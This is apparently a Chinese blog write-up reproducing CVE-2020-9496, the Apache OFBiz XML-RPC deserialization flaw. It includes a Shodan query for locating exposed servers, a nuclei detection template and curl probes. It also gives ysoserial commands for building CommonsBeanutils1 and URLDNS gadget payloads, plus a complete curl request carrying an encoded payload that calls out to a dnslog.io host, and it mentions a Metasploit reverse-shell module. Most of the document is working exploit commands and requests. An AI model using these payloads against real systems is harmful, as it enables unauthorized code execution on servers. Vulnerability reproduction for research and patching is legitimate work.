0%

CVE-2020-9496_OFBiz反序列化漏洞复现

影响范围

  • < 17.12.04版本

资产特征

  • Set-Cookie : OFBiz.Visitor

shodan搜索相关资产

1
shodan search --fields ip_str,port,org,hostnames OFBiz.Visitor

具体就不贴了。

POC

cve-2020-9496

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
id: CVE-2020-9496

info:
name: Apache OFBiz XML-RPC Java Deserialization
author: dwisiswant0
severity: medium

# This temaplte detects a Java deserialization vulnerability in Apache
# OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for
# versions prior to 17.12.04.
# --
# References:
# - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz

requests:
- raw:
- |
POST /webtools/control/xmlrpc HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml

<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
matchers-condition: and
matchers:
- type: word
words:
- "faultString"
- "No such service [ProjectDiscovery]"
- "methodResponse"
condition: and
part: body
- type: word
words:
- "Content-Type: text/xml"
part: header
- type: status
status:
- 200

方法一

1
echo "https://localhost:8443" | nuclei -t cves/CVE-2020-9496.yaml

方法二

1
curl https://localhost:8443/webtools/control/xmlrpc -v -X POST -A 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'  -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>' -k -H 'Content-Type: application/xml'

方法三

1
java -jar ysoserial-master-SNAPSHOT.jar CommonsBeanutils1 "touch /tmp/cve-2020-9496" | base64 | tr -d "\n"
1
java -jar ysoserial-master-SNAPSHOT.jar URLDNS "http://dnslog.io" | base64 | tr -d "\n"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
POST /webtools/control/xmlrpc HTTP/1.1
Host: localhost:8443
Content-Type: application/xml
Content-Length: 4093

<?xml version="1.0"?>
<methodCall>
<methodName>ProjectDiscovery</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>test</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64-payload]</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
1
curl http://localhost:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAEWcxNjFjLmwuZG5zbG9nLmlvdAAAcQB+AAV0AARodHRwcHh0ABhodHRwOi8vZzE2MWMubC5kbnNsb2cuaW94</serializable></value></member></struct></value></param></params></methodCall>' -k  -H 'Content-Type:application/xml'

方法四

msf里面有该反弹shell的exp。

参考链接